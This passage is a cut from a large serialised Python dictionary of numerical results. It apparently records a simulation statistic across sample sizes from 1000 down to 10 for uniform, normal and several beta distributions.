0.2363567433663108, 'beta1': 0.19691891448710852, 'beta2': 0.2503172522739228, 'beta4': 0.17491986059664721}, 50: {'uni': 0.23826972176926864, 'nor': 0.27685077279441733, 'beta1': 0.23825989017305044, 'beta2': 0.2868672428900947, 'beta4': 0.21882117630157366}, 30: {'uni': 0.31201675069446144, 'nor': 0.3343598643931398, 'beta1': 0.3060809831180182, 'beta2': 0.3440276319271851, 'beta4': 0.29233201067867287}, 20: {'uni': 0.3759351158966905, 'nor': 0.398490239918883, 'beta1': 0.38101245327903976, 'beta2': 0.39923128747203945, 'beta4': 0.3603116968657404}, 10: {'uni': 0.5196174604512347, 'nor': 0.5370629326824977, 'beta1': 0.5227401105260507, 'beta2': 0.5353245869799641, 'beta4': 0.5038900663854036}}, 75: {1000: {'uni': 0.05581476206336089, 'nor': 
0.14996311847318278, 'beta1': 0.05365675549099019, 'beta2': 0.17055018709179848, 'beta4': 0.04193211124195961}, 750: {'uni': 0.06309942452483619, 'nor': 0.15522283922657953, 'beta1': 0.06265439072142831, 'beta2': 0.17240879861617764, 'beta4': 0.048386543332347154}, 500: {'uni': 0.07754087582450486, 'nor': 0.16332486956676168, 'beta1': 0.07743582625568735, 'beta2': 0.17781956208843652, 'beta4': 0.059938160945287436}, 400: {'uni': 0.0859009285413197, 'nor': 0.16455528208539544, 'beta1': 0.0859009551340934, 'beta2': 0.18121441364820234, 'beta4': 0.06915251664696331}, 300: {'uni': 0.09986347174843568, 'nor': 0.1761029972514011, 'beta1': 0.0985448164318779, 'beta2': 0.19063671853439235, 'beta4': 0.07940996126345179}, 200: {'uni': 0.1219446322586436, 'nor': 0.19088686764778073, 'beta1': 0.12203985328563413, 'beta2': 0.20221466589744463, 'beta4': 0.09911706486857708}, 150: {'uni': 0.14134327292980867, 'nor': 0.2075824873820286, 'beta1': 0.13918231909157353, 'beta2': 0.21544497996445033, 'beta4': 0.11793244074486325}, 100: {'uni': 0.1687636072286217, 'nor': 0.22966914010762518, 'beta1': 0.17145469012205217, 'beta2': 0.2386137561260998, 'beta4': 0.14523799945462573}, 75: {'uni': 0.19703843729601045, 'nor': 0.2452280144193495, 'beta1': 0.19774506037472683, 'beta2': 0.2578913259496163, 'beta4': 0.17331141348235535}, 50: {'uni': 0.23561918913475827, 'nor': 0.28225307485813256, 'beta1': 0.23938641208932598, 'beta2': 0.2860719183825794, 'beta4': 0.2152316198436074}, 30: {'uni': 0.3063193649262127, 'nor': 0.3405329572940864, 'beta1': 0.30716509640473844, 'beta2': 0.34335563947301895, 'beta4': 0.28587386510907925}, 20: {'uni': 0.3767551692150056, 'nor': 0.4031495423576498, 'beta1': 0.37352751762215214, 'beta2': 0.4017493254898249, 'beta4': 0.351543039258803}, 10: {'uni': 0.5135684852674217, 'nor': 0.5436208094855315, 'beta1': 0.5192701884000489, 'beta2': 0.541210448929448, 'beta4': 0.5038013131913337}}, 50: {1000: {'uni': 0.057842757890233965, 'nor': 0.176724096627361, 'beta1': 
0.05408363038722486, 'beta2': 0.1893425096945247, 'beta4': 0.04177685643849072}, 750: {'uni': 0.06538542437484401, 'nor': 0.18526810074262368, 'beta1': 0.06262861062085978, 'beta2': 0.19081050404679278, 'beta4': 0.048138028850044035}, 500: {'uni': 0.0792274657176204, 'nor': 0.19075398241126212, 'beta1': 0.0781712308607096, 'beta2': 0.19703705491038603, 'beta4': 0.0588888677259701}, 400: {'uni': 0.08735181776995748, 'nor': 0.19733138997918653, 'beta1': 0.08671034907348185, 'beta2': 0.2029356394631182, 'beta4': 0.066356031342088}, 300: {'uni': 0.10038917910081224, 'nor': 0.2029037006087926, 'beta1': 0.09984458469801827, 'beta2': 0.2063407376940214, 'beta4': 0.07823225938947853}, 200: {'uni': 0.12225034725079975, 'nor': 0.21748256503914343, 'beta1': 0.12127009856496679, 'beta2': 0.21298920413518108, 'beta4': 0.09725242174322574}, 150: {'uni': 0.13784882603896337, 'nor': 0.2249234497071243, 'beta1': 0.142780623344778, 'beta2': 0.22771126781508755, 'beta4': 0.11232814682225023}, 100: {'uni': 0.1714971001027576, 'nor': 0.25130430723045216, 'beta1': 0.17149311831470596, 'beta2': 0.24575615134422085, 'beta4': 0.14352315798485257}, 75: {'uni': 0.19880624921564277, 'nor': 0.26882383206094734, 'beta1': 0.19913517567203842, 'beta2': 0.26323216252272097, 'beta4': 0.16694848958957278}, 50: {'uni': 0.24301893705195066, 'nor': 0.30053473330563535, 'beta1': 0.2437319298178, 'beta2': 0.2954722207006947, 'beta4': 0.21057399371569013}, 30: {'uni': 0.3061807816995066, 'nor': 0.3627984661916076, 'beta1': 0.30909416778391374, 'beta2': 0.35432147654309276, 'beta4': 0.28138283811427534}, 20: {'uni': 0.3762292155636904, 'nor': 0.4143457355174486, 'beta1': 0.37003582598685447, 'beta2': 0.417463947271284, 'beta4': 0.35099161339155716}, 10: {'uni': 0.5146354857060667, 'nor': 0.5544668904963077, 'beta1': 0.5140864742286797, 'beta2': 0.5502638339716877, 'beta4': 0.5028168394982335}}, 30: {1000: {'uni': 0.06167755027974642, 'nor': 0.23144501325358247, 'beta1': 0.05443549286004057, 'beta2': 
0.21030902628970505, 'beta4': 0.04112353109993838}, 750: {'uni': 0.06986464831340056, 'nor': 0.23157834653825105, 'beta1': 0.06298033424844018, 'beta2': 0.216023883145685, 'beta4': 0.04803956198514081}, 500: {'uni': 0.08291783316058687, 'nor': 0.23718889406318566, 'beta1': 0.07704332442547329, 'beta2': 0.21732439854980712, 'beta4': 0.059507078517589906}, 400: {'uni': 0.09066454957494724, 'nor': 0.24292620517074537, 'beta1': 0.08498286362579072, 'beta2': 0.22266027695887336, 'beta4': 0.06609086320354882}, 300: {'uni': 0.10418406038463879, 'nor': 0.2475908290265445, 'beta1': 0.10110680990030668, 'beta2': 0.2275142158690745, 'beta4': 0.07602884420540873}, 200: {'uni': 0.12340725206644898, 'nor': 0.2577901680164382, 'beta1': 0.12378156154379666, 'beta2': 0.23814817788828757, 'beta4': 0.0942162762280091}, 150: {'uni': 0.14201468529779537, 'nor': 0.2714996335714514, 'beta1': 0.14041437088952297, 'beta2': 0.24705628359301424, 'beta4': 0.1115326221157299}, 100: {'uni': 0.17156911043689577, 'nor': 0.2910591493981809, 'beta1': 0.17229628287565757, 'beta2': 0.26827556800042573, 'beta4': 0.1379958628810278}, 75: {'uni': 0.19484440138573444, 'nor': 0.30551022793589416, 'beta1': 0.19665653140894246, 'beta2': 0.2834507380462248, 'beta4': 0.16309095353377234}, 50: {'uni': 0.2410672107187225, 'nor': 0.33499572655115767, 'beta1': 0.24405909195603415, 'beta2': 0.31230260400439824, 'beta4': 0.2051899383337094}, 30: {'uni': 0.30479652249512135, 'nor': 0.38800092181160023, 'beta1': 0.30744408184030536, 'beta2': 0.3593455522789838, 'beta4': 0.27314032884799155}, 20: {'uni': 0.37449454977510127, 'nor': 0.4460662326088321, 'beta1': 0.3700752962830209, 'beta2': 0.4167874835239967, 'beta4': 0.3384436437562991}, 10: {'uni': 0.5116314558801505, 'nor': 0.5755223794724841, 'beta1': 0.5150076058914129, 'beta2': 0.5514563941928305, 'beta4': 0.4917892863434117}}, 20: {1000: {'uni': 0.06959685300772211, 'nor': 0.28757410567549513, 'beta1': 0.053953981515175053, 'beta2': 0.23479744605814812, 'beta4': 
0.04068104631305974}, 750: {'uni': 0.07583228548956522, 'nor': 0.2893885231958583, 'beta1': 0.06269020138133452, 'beta2': 0.2398017512195938, 'beta4': 0.0477206084818706}, 500: {'uni': 0.08760381160767208, 'nor': 0.2873807845879558, 'beta1': 0.07722766319523955, 'beta2': 0.24182381981064882, 'beta4': 0.05857000112490568}, 400: {'uni': 0.09700627334635992, 'nor': 0.2945018063796199, 'beta1': 0.08605947968141531, 'beta2': 0.2454067726287148, 'beta4': 0.0658297775312253}, 300: {'uni': 0.10812260594449896, 'nor': 0.3044832061482207, 'beta1': 0.09982313247817287, 'beta2': 0.25311285877382617, 'beta4': 0.07470120923689594}, 200: {'uni': 0.13067538774601684, 'nor': 0.307381114817036, 'beta1': 0.1207002057565804, 'beta2': 0.26262764232583313, 'beta4': 0.09381753824822037}, 150: {'uni': 0.1437519246686677, 'nor': 0.3206091659846585, 'beta1': 0.13867393280816304, 'beta2': 0.265394034224661, 'beta4': 0.10931783353586122}, 100: {'uni': 0.17189740592688724, 'nor': 0.3280544098249214, 'beta1': 0.16810853258661185, 'beta2': 0.2803147606488574, 'beta4': 0.13269638171126513}, 75: {'uni': 0.2003549991132838, 'nor': 0.34489520732083756, 'beta1': 0.19657825911151428, 'beta2': 0.29584161685011867, 'beta4': 0.15555948793153623}, 50: {'uni': 0.24046928357188047, 'nor': 0.3831682316031932, 'beta1': 0.24031547155678468, 'beta2': 0.3259770855267306, 'beta4': 0.19629711424440732}, 30: {'uni': 0.3080680301232709, 'nor': 0.42303226265926963, 'beta1': 0.30509121084648144, 'beta2': 0.37610727416155765, 'beta4': 0.2609876476177542}, 20: {'uni': 0.373297668166573, 'nor': 0.475814762443992, 'beta1': 0.3757648466315679, 'beta2': 0.42264940499356346, 'beta4': 0.3284256078618326}, 10: {'uni': 0.5140039283349758, 'nor': 0.5950313110777266, 'beta1': 0.5170351561226657, 'beta2': 0.555063447840049, 'beta4': 0.473618190051116}}, 10: {1000: {'uni': 0.1000131525742068, 'nor': 0.409864047721089, 'beta1': 0.09113480290581626, 'beta2': 0.2804979904810423, 'beta4': 0.04087846848948132}, 750: {'uni': 
0.10360258940868095, 'nor': 0.41929372322534414, 'beta1': 0.09114741734335415, 'beta2': 0.28114038955842613, 'beta4': 0.0477679066813847}, 500: {'uni': 0.11195961020305714, 'nor': 0.4157829085773251, 'beta1': 0.09126098733586951, 'beta2': 0.28657849318925166, 'beta4': 0.058399050643070494}, 400: {'uni': 0.11729638239795848, 'nor': 0.4260504597395027, 'beta1': 0.09154740289766372, 'beta2': 0.28504911455818494, 'beta4': 0.06534589576597083}, 300: {'uni': 0.12830729394341506, 'nor': 0.4205120474737974, 'beta1': 0.10096554208890152, 'beta2': 0.2936910855153506, 'beta4': 0.075492287165148}, 200: {'uni': 0.14515187402988394, 'nor': 0.435914384534595, 'beta1': 0.12215037845816623, 'beta2': 0.2981966625105821, 'beta4': 0.09167242348680918}, 150: {'uni': 0.15934251639018754, 'nor': 0.4395473221709565, 'beta1': 0.14085779880718263, 'beta2': 0.31177123240394505, 'beta4': 0.10719443660940275}, 100: {'uni': 0.18512635552666046, 'nor': 0.4563048193604518, 'beta1': 0.16884027642286348, 'beta2': 0.3151628444983027, 'beta4': 0.12974440442356955}, 75: {'uni': 0.2071031402154928, 'nor': 0.46661064860968665, 'beta1': 0.19804032027111418, 'beta2': 0.33533567264141617, 'beta4': 0.15103905584519184}, 50: {'uni': 0.24733757785161503, 'nor': 0.48136759185068323, 'beta1': 0.2403341444387983, 'beta2': 0.3594046504015401, 'beta4': 0.1890136163469433}, 30: {'uni': 0.3069533690198551, 'nor': 0.5223418943718963, 'beta1': 0.30599677039266915, 'beta2': 0.3983639241051619, 'beta4': 0.2534266062192869}, 20: {'uni': 0.3735600858621225, 'nor': 0.5590331645199271, 'beta1': 0.3745545851840409, 'beta2': 0.44871940334430627, 'beta4': 0.309129001754901}, 10: {'uni': 0.5079603855850016, 'nor': 0.6714692142813454, 'beta1': 0.5137289273763032, 'beta2': 0.5696425643135812, 'beta4': 0.45864540314219915}}}, 0.01: {1000: {1000: {'uni': 0.05129485367689102, 'nor': 0.06281083509171664, 'beta1': 0.05107806686939176, 'beta2': 0.10147434204599137, 'beta4': 0.04481834422995701}, 750: {'uni': 0.05933719566503981, 'nor': 
0.07044954783713647, 'beta1': 0.05907830933987235, 'beta2': 0.10443582378448724, 'beta4': 0.05337370850693279}, 500: {'uni': 0.07297584959697972, 'nor': 0.08154345761298731, 'beta1': 0.07271983245642422, 'beta2': 0.11266519507619366, 'beta4': 0.06585853402432429}, 400: {'uni': 0.08090786389591842, 'nor': 0.08992168016454061, 'beta1': 0.08128421415396725, 'beta2': 0.11609404475794888, 'beta4': 0.07649643394160888}, 300: {'uni': 0.09388546103833217, 'nor': 0.09955321885077567, 'beta1': 0.09345709665753016, 'beta2': 0.12649006695142406, 'beta4': 0.08841359390615178}, 200: {'uni': 0.11353626166629766, 'nor': 0.12048393062982926, 'beta1': 0.11474986795545838, 'beta2': 0.14179352445516558, 'beta4': 0.10994312621177804}, 150: {'uni': 0.1327942158900352, 'nor': 0.13672326054920736, 'beta1': 0.13088297498674817, 'beta2': 0.15495612418375992, 'beta4': 0.12759146981003233}, 100: {'uni': 0.16208800134443502, 'nor': 0.1634608738492047, 'beta1': 0.16483383061835577, 'beta2': 0.179293345468783, 'beta4': 0.15587772291645302}, 75: {'uni': 0.18573927578217658, 'nor': 0.18826509813153808, 'beta1': 0.18535362149382184, 'beta2': 0.20246761284986203, 'beta4': 0.18363587582052376}, 50: {'uni': 0.22602880452129426, 'nor': 0.22721053058692026, 'beta1': 0.22647423560537766, 'beta2': 0.24132302056400629, 'beta4': 0.22214505424144632}, 30: {'uni': 0.2866957560674456, 'nor': 0.29122835505552935, 'beta1': 0.2929636790178528, 'beta2': 0.30200243653413883, 'beta4': 0.2919094262056585}, 20: {'uni': 0.35528611293244305, 'nor': 0.35294865538334086, 'beta1': 0.35330451666561385, 'beta2': 0.3561690331631435, 'beta4': 0.3471108536518231}, 10: {'uni': 0.4898429521852865, 'nor': 0.48995064698146334, 'beta1': 0.4916404496017533, 'beta2': 0.49434298684781663, 'beta4': 0.48152800061187356}}, 750: {1000: {'uni': 0.051534656619642405, 'nor': 0.06661040036430238, 'beta1': 0.05119210087714571, 'beta2': 0.1017170167766821, 'beta4': 0.04405968156885359}, 750: {'uni': 0.059392840143921544, 'nor': 
0.07295941378208323, 'beta1': 0.0593079696092893, 'beta2': 0.10498534334941645, 'beta4': 0.05213727865509954}, 500: {'uni': 0.07232105894578911, 'nor': 0.0845454668484768, 'beta1': 0.07269799849643532, 'beta2': 0.1124804653100443, 'beta4': 0.06550213106063163}, 400: {'uni': 0.08051435061250778, 'nor': 0.09174262237208586, 'beta1': 0.0814260013663316, 'beta2': 0.11733914354575858, 'beta4': 0.07417771351439317}, 300: {'uni': 0.09264055215696232, 'nor': 0.10295017205097534, 'beta1': 0.09346566052436689, 'beta2': 0.12655756797177392, 'beta4': 0.08787578197242896}, 200: {'uni': 0.11483671598870576, 'nor': 0.12366825601571851, 'beta1': 0.11322629942862356, 'beta2': 0.14042506799186272, 'beta4': 0.10722297353789534}, 150: {'uni': 0.13158644004287812, 'nor': 0.1389969192433652, 'beta1': 0.13055409411440705, 'beta2': 0.15647066832130707, 'beta4': 0.12705846586847036}, 100: {'uni': 0.16186652500083287, 'nor': 0.1673332759029187, 'beta1': 0.16128287338366937, 'beta2': 0.18038226627656384, 'beta4': 0.15611827317289068}, 75: {'uni': 0.18764543571574965, 'nor': 0.19095691792223274, 'beta1': 0.18794282479122293, 'beta2': 0.20449321398176196, 'beta4': 0.18061820709529477}, 50: {'uni': 0.226171463050115, 'nor': 0.2289935327391464, 'beta1': 0.22801373082023235, 'beta2': 0.24150428904957089, 'beta4': 0.22665004770368552}, 30: {'uni': 0.28965332928325704, 'nor': 0.29481852702352496, 'beta1': 0.29443285351219906, 'beta2': 0.30448017108169273, 'beta4': 0.2841177753703454}, 20: {'uni': 0.35303732347834804, 'nor': 0.35175872269014363, 'beta1': 0.3488588172685543, 'beta2': 0.36473759502844405, 'beta4': 0.3489149265132695}, 10: {'uni': 0.48746885638524173, 'nor': 0.48910846637687666, 'beta1': 0.4854441287384354, 'beta2': 0.499312939413207, 'beta4': 0.4820854775286469}}, 500: {1000: {'uni': 0.05070668798111183, 'nor': 0.07307564348735107, 'beta1': 0.05136358571645222, 'beta2': 0.10754414306745141, 'beta4': 0.04335466469142435}, 750: {'uni': 0.05930859802961075, 'nor': 0.07913755555471735, 
'beta1': 0.058713049033531806, 'beta2': 0.11202765188630714, 'beta4': 0.05072594836982958}, 500: {'uni': 0.07250391695991487, 'nor': 0.08997714013244151, 'beta1': 0.07217245096062674, 'beta2': 0.11976047636593312, 'beta4': 0.06369794357960606}, 400: {'uni': 0.08087401871675737, 'nor': 0.09762299221558252, 'beta1': 0.08126385640568756, 'beta2': 0.12524922843485486, 'beta4': 0.07246464421624788}, 300: {'uni': 0.09286272646331206, 'nor': 0.10639090401076873, 'beta1': 0.09360831758476895, 'beta2': 0.13480385220989233, 'beta4': 0.08484641064573195}, 200: {'uni': 0.11369861261647718, 'nor': 0.1259649259062341, 'beta1': 0.11535049725347946, 'beta2': 0.15023672569159274, 'beta4': 0.10654459673560468}, 150: {'uni': 0.13094331807012105, 'nor': 0.1419771822231538, 'beta1': 0.13242263806323107, 'beta2': 0.16312614939587444, 'beta4': 0.12204776890498104}, 100: {'uni': 0.16010520707772924, 'nor': 0.16829119335024995, 'beta1': 0.161780824516852, 'beta2': 0.1845635350197833, 'beta4': 0.15500764249014892}, 75: {'uni': 0.18569722037995617, 'nor': 0.19404858222754012, 'beta1': 0.18353587169284724, 'beta2': 0.21024744989486982, 'beta4': 0.18093047276834628}, 50: {'uni': 0.2249952534487163, 'nor': 0.23470807584810854, 'beta1': 0.22394207853083203, 'beta2': 0.24369571318319788, 'beta4': 0.22404400464903013}, 30: {'uni': 0.28922639988339793, 'nor': 0.29694440849160253, 'beta1': 0.28930513852142603, 'beta2': 0.3061086815618318, 'beta4': 0.28197149415512585}, 20: {'uni': 0.3532159395936194, 'nor': 0.3594610656143175, 'beta1': 0.35424253066365413, 'beta2': 0.3629738556479084, 'beta4': 0.34892709778660913}, 10: {'uni': 0.49319776417333205, 'nor': 0.4919346045056977, 'beta1': 0.4914053992328329, 'beta2': 0.4956418018212609, 'beta4': 0.48866367027428953}}, 400: {1000: {'uni': 0.05171872696982288, 'nor': 0.0779968485408219, 'beta1': 0.05125234103750187, 'beta2': 0.10749424790797857, 'beta4': 0.04243112506333324}, 750: {'uni': 0.05942664915165613, 'nor': 0.08278471622725792, 'beta1': 
0.059045226639506954, 'beta2': 0.11246496346057688, 'beta4': 0.049669130629863556}, 500: {'uni': 0.07189692356904676, 'nor': 0.09361598801023086, 'beta1': 0.0721804928498383, 'beta2': 0.11937872756887818, 'beta4': 0.06327011110935565}, 400: {'uni': 0.08084614058304584, 'nor': 0.10080942415469252, 'beta1': 0.0797135489432822, 'beta2': 0.1257152874686207, 'beta4': 0.07054543139847541}, 300: {'uni': 0.09394710441562093, 'nor': 0.10983774809278396, 'beta1': 0.09317847768978005, 'beta2': 0.13400641076171205, 'beta4': 0.08372788015883226}, 200: {'uni': 0.11516939973345491, 'nor': 0.1279698675017119, 'beta1': 0.11283277809965603, 'beta2': 0.14878256141575052, 'beta4': 0.10481300302685173}, 150: {'uni': 0.13103481700869724, 'nor': 0.14459734582575978, 'beta1': 0.13109809480602197, 'beta2': 0.1634096298903665, 'beta4': 0.1224780784738968}, 100: {'uni': 0.1610805901347358, 'nor': 0.16904015329738042, 'beta1': 0.1602232613963524, 'beta2': 0.1874426452084551, 'beta4': 0.15348776308096057}, 75: {'uni': 0.18177371768073364, 'nor': 0.19670702076359703, 'beta1': 0.1844925024391989, 'beta2': 0.2105191447384148, 'beta4': 0.17783506013311623}, 50: {'uni': 0.2252328815143954, 'nor': 0.231721726836716, 'beta1': 0.22366230144945903, 'beta2': 0.24781167529857046, 'beta4': 0.21942405296052814}, 30: {'uni': 0.28864743546145355, 'nor': 0.2970598210895456, 'beta1': 0.2893646586257687, 'beta2': 0.30151561161895035, 'beta4': 0.2852000453369167}, 20: {'uni': 0.3560880816420639, 'nor': 0.35816852147038125, 'beta1': 0.3587921441788674, 'beta2': 0.3713605213188108, 'beta4': 0.3507319434269337}, 10: {'uni': 0.48715561247362865, 'nor': 0.491578769317442, 'beta1': 0.4763429028968493, 'beta2': 0.5009132622576649, 'beta4': 0.4858863544709412}}, 300: {1000: {'uni': 0.05116236960288739, 'nor': 0.08362687693280035, 'beta1': 0.051368373495024544, 'beta2': 0.11446474352863178, 'beta4': 0.04119784019711356}, 750: {'uni': 0.05993893748144197, 'nor': 0.088975002045106, 'beta1': 0.05945536094744841, 'beta2': 
0.1192867892763042, 'beta4': 0.04845162600368419}, 500: {'uni': 0.07274728302306016, 'nor': 0.09828413734395919, 'beta1': 0.07212817693643503, 'beta2': 0.12627777617615477, 'beta4': 0.06160395430770016}, 400: {'uni': 0.08073474547539339, 'nor': 0.10507281592449369, 'beta1': 0.08024944641722576, 'beta2': 0.1303092084298162, 'beta4': 0.06982921110804863}, 300: {'uni': 0.09317526758440403, 'nor': 0.11705090342781177, 'beta1': 0.09315546513078332, 'beta2': 0.1399551702427777, 'beta4': 0.08158816157237775}, 200: {'uni': 0.11409958755150595, 'nor': 0.1314488095008084, 'beta1': 0.11453286833437615, 'beta2': 0.1567790320303898, 'beta4': 0.10362462756693636}, 150: {'uni': 0.130936819362498, 'nor': 0.1493233271345169, 'beta1': 0.13150912092144829, 'beta2': 0.169701096896674, 'beta4': 0.12193228046643229}, 100: {'uni': 0.16243451017422467, 'nor': 0.1757607427080965, 'beta1': 0.160383901558243, 'beta2': 0.19244715618473562, 'beta4': 0.1514647915916582}, 75: {'uni': 0.1853859134119128, 'nor': 0.1958997856947285, 'beta1': 0.18687394388066536, 'beta2': 0.21186212806019417, 'beta4': 0.17618375652600887}, 50: {'uni': 0.22498609458966784, 'nor': 0.23730546516440537, 'beta1': 0.22564497853587992, 'beta2': 0.25068612614680547, 'beta4': 0.22025976236280248}, 30: {'uni': 0.2883890795435333, 'nor': 0.29983573055446033, 'beta1': 0.2921073149317487, 'beta2': 0.3082785804677224, 'beta4': 0.28437957017383403}, 20: {'uni': 0.350662368824897, 'nor': 0.36066581276090837, 'beta1': 0.35036112927618646, 'beta2': 0.36698531659291206, 'beta4': 0.34399861518395175}, 10: {'uni': 0.48773425736194487, 'nor': 0.4897587539768351, 'beta1': 0.48597353289535955, 'beta2': 0.5016469184252377, 'beta4': 0.48930033694496555}}, 200: {1000: {'uni': 0.05099550061354963, 'nor': 0.09621002435011294, 'beta1': 0.05097248744906935, 'beta2': 0.1270148971959001, 'beta4': 0.04066696015503554}, 750: {'uni': 0.05897057501846892, 'nor': 0.10125250087843168, 'beta1': 0.05929595778075081, 'beta2': 0.13114280729155686, 'beta4': 
0.04768802094469193}, 500: {'uni': 0.07196269990769555, 'nor': 0.10929050520651495, 'beta1': 0.07283579022785935, 'beta2': 0.13763586545366968, 'beta4': 0.060027142657854}, 400: {'uni': 0.08054788114980349, 'nor': 0.11648685006536474, 'beta1': 0.0811659726275793, 'beta2': 0.14360472688257275, 'beta4': 0.06804198089690716}, 300: {'uni': 0.09360446147057411, 'nor': 0.12347797475561295, 'beta1': 0.09391365693051856, 'beta2': 0.15084726685668082, 'beta4': 0.07971992088255381}, 200: {'uni': 0.11420590046780266, 'nor': 0.13996925144507733, 'beta1': 0.11318748651513358, 'beta2': 0.1649173148462807, 'beta4': 0.10100464440514964}, 150: {'uni': 0.13159721869668134, 'nor': 0.15543417245376623, 'beta1': 0.1306662632283953, 'beta2': 0.17863248019784544, 'beta4': 0.11926356604886618}, 100: {'uni': 0.1616085474743723, 'nor': 0.18126496559108407, 'beta1': 0.16180591430502922, 'beta2': 0.20079768282663685, 'beta4': 0.14662232668007058}, 75: {'uni': 0.18466397256542888, 'nor': 0.20167396401497723, 'beta1': 0.18454565366419512, 'beta2': 0.22144937952843802, 'beta4': 0.1723673372282205}, 50: {'uni': 0.22429367090067337, 'nor': 0.2421981518299573, 'beta1': 0.22627305994598435, 'beta2': 0.25417001184524735, 'beta4': 0.21615315140042368}, 30: {'uni': 0.2891984285711773, 'nor': 0.3022022225666101, 'beta1': 0.2885857727546917, 'beta2': 0.31488071890675523, 'beta4': 0.27946891056788803}, 20: {'uni': 0.35272562205198627, 'nor': 0.3597248755608644, 'beta1': 0.34988508357633813, 'beta2': 0.37359776285196444, 'beta4': 0.3452123858638153}, 10: {'uni': 0.4934504641167673, 'nor': 0.4953893325003678, 'beta1': 0.49326648601757545, 'beta2': 0.5048531792897072, 'beta4': 0.48425541230404723}}, 150: {1000: {'uni': 0.051578990681795306, 'nor': 0.10587724278324923, 'beta1': 0.05100434131700521, 'beta2': 0.1385651893710681, 'beta4': 0.040131066622810074}, 750: {'uni': 0.05964212868791385, 'nor': 0.11070421199591629, 'beta1': 0.058951783674372704, 'beta2': 0.1401604284675425, 'beta4': 0.04709391177274086}, 
500: {'uni': 0.07278161439913988, 'nor': 0.12078841684699831, 'beta1': 0.07292441980479603, 'beta2': 0.14450764888197143, 'beta4': 0.058999750381320826}, 400: {'uni': 0.08088169280004709, 'nor': 0.12433378065418932, 'beta1': 0.08132095020607566, 'beta2': 0.15222740175561678, 'beta4': 0.06647480909025247}, 300: {'uni': 0.0939218287454483, 'nor': 0.13477079040381174, 'beta1': 0.09374450977190885, 'beta2': 0.15925231238657545, 'beta4': 0.07809357504147704}, 200: {'uni': 0.11376771084448467, 'nor': 0.14849656103329123, 'beta1': 0.11448673216899263, 'beta2': 0.17267349109969787, 'beta4': 0.09768020272133693}, 150: {'uni': 0.13248417636554644, 'nor': 0.16487086808018317, 'beta1': 0.13201540731601635, 'beta2': 0.18463196235548684, 'beta4': 0.11564332215144385}, 100: {'uni': 0.15986880516145718, 'nor': 0.18568769522330097, 'beta1': 0.16083695049744096, 'beta2': 0.20763142518129513, 'beta4': 0.14518253285735372}, 75: {'uni': 0.18453989535605683, 'nor': 0.20888765477064086, 'beta1': 0.18449616472594121, 'beta2': 0.2273477267710795, 'beta4': 0.1717298602845287}, 50: {'uni': 0.225005258500509, 'nor': 0.2457096370841649, 'beta1': 0.2261275447013404, 'beta2': 0.2614753286995815, 'beta4': 0.21363887611658533}, 30: {'uni': 0.2895467650368521, 'nor': 0.30561459985547096, 'beta1': 0.28870673052245394, 'beta2': 0.3182687898914055, 'beta4': 0.2785792145404429}, 20: {'uni': 0.3510013380043752, 'nor': 0.3689369050495814, 'beta1': 0.35376596345288086, 'beta2': 0.3753745534011983, 'beta4': 0.34145606872993056}, 10: {'uni': 0.4879912533176197, 'nor': 0.49642038735952065, 'beta1': 0.48769549189795697, 'beta2': 0.5050788225647467, 'beta4': 0.4785566786480819}}, 100: {1000: {'uni': 0.05191039332270719, 'nor': 0.1245351360241278, 'beta1': 0.050997006206302875, 'beta2': 0.1460504259615869, 'beta4': 0.039905064803095525}, 750: {'uni': 0.05998871346519452, 'nor': 0.1294606683925581, 'beta1': 0.05847700732727823, 'beta2': 0.15021805913043595, 'beta4': 0.04601974795368319}, 500: {'uni': 
0.07341973515609257, 'nor': 0.13531370556475342, 'beta1': 0.07268776551364053, 'beta2': 0.15390577989276166, 'beta4': 0.05694920670041542}, 400: {'uni': 0.08067103236103346, 'nor': 0.14321047014928123, 'beta1': 0.08067289579950143, 'beta2': 0.15985350854382507, 'beta4': 0.06537605030613047}, 300: {'uni': 0.09438397276573021, 'nor': 0.14904746557912396, 'beta1': 0.09398651936888375, 'beta2': 0.16721766000932792, 'beta4': 0.07618184832746211}, 200: {'uni': 0.11527057686285336, 'nor': 0.1642522242508767, 'beta1': 0.11389959855243442, 'beta2': 0.18023752667719684, 'beta4': 0.09672312219072954}, 150: {'uni': 0.13216312596618518, 'nor': 0.1751857316995788, 'beta1': 0.1302080010184946, 'beta2': 0.1927573270242654, 'beta4': 0.11238481899540864}, 100: {'uni': 0.16076877833678727, 'nor': 0.19975581943363707, 'beta1': 0.16079488576960266, 'beta2': 0.20995618985866715, 'beta4': 0.14127998845587303}, 75: {'uni': 0.18434632621362634, 'nor': 0.21848200560175463, 'beta1': 0.18642816894352734, 'beta2': 0.23061939766314457, 'beta4': 0.16533631802523197}, 50: {'uni': 0.22724922024813737, 'nor': 0.2584378792366021, 'beta1': 0.22695557193281157, 'beta2': 0.2675887560653766, 'beta4': 0.20740264516587753}, 30: {'uni': 0.2918722908611385, 'nor': 0.3155005347993203, 'beta1': 0.2926574234664835, 'beta2': 0.3225067701718885, 'beta4': 0.27375474423769725}, 20: {'uni': 0.3454149675998711, 'nor': 0.37444691882619846, 'beta1': 0.3534455881933011, 'beta2': 0.37908898284769055, 'beta4': 0.33782534459856733}, 10: {'uni': 0.48995308583601727, 'nor': 0.5057924764345054, 'beta1': 0.48712627773712436, 'beta2': 0.509289943720692, 'beta4': 0.4760256361246777}}, 75: {1000: {'uni': 0.05263806893207712, 'nor': 0.1426387862890096, 'beta1': 0.050861516064434786, 'beta2': 0.1550912428095914, 'beta4': 0.03942562584827963}, 750: {'uni': 0.05987895965521034, 'nor': 0.14543562438841662, 'beta1': 0.05843122916552068, 'beta2': 0.1621832342719166, 'beta4': 0.04641508440087805}, 500: {'uni': 0.0729716053027788, 'nor': 
0.14981406322703128, 'beta1': 0.07136667899438129, 'beta2': 0.16497360040986309, 'beta4': 0.05736466968785836}, 400: {'uni': 0.08175178171124547, 'nor': 0.15594408152690709, 'beta1': 0.08094487541872952, 'beta2': 0.17052351554071665, 'beta4': 0.0643906104219426}, 300: {'uni': 0.09174467790257729, 'nor': 0.16325422501166353, 'beta1': 0.09381129166957458, 'beta2': 0.17484070317567046, 'beta4': 0.07488233712902187}, 200: {'uni': 0.11347575789530223, 'nor': 0.17663300299982598, 'beta1': 0.11326725293489726, 'beta2': 0.1883129177850832, 'beta4': 0.0942089295423881}, 150: {'uni': 0.131120018205924, 'nor': 0.19093489533419694, 'beta1': 0.13205247166475537, 'beta2': 0.19914811519378778, 'beta4': 0.11204039761886475}, 100: {'uni': 0.16082564475037464, 'nor': 0.20856290260278498, 'beta1': 0.1625220254469636, 'beta2': 0.22253364361870465, 'beta4': 0.13842685894102613}, 75: {'uni': 0.18769569670626118, 'nor': 0.22923558297249835, 'beta1': 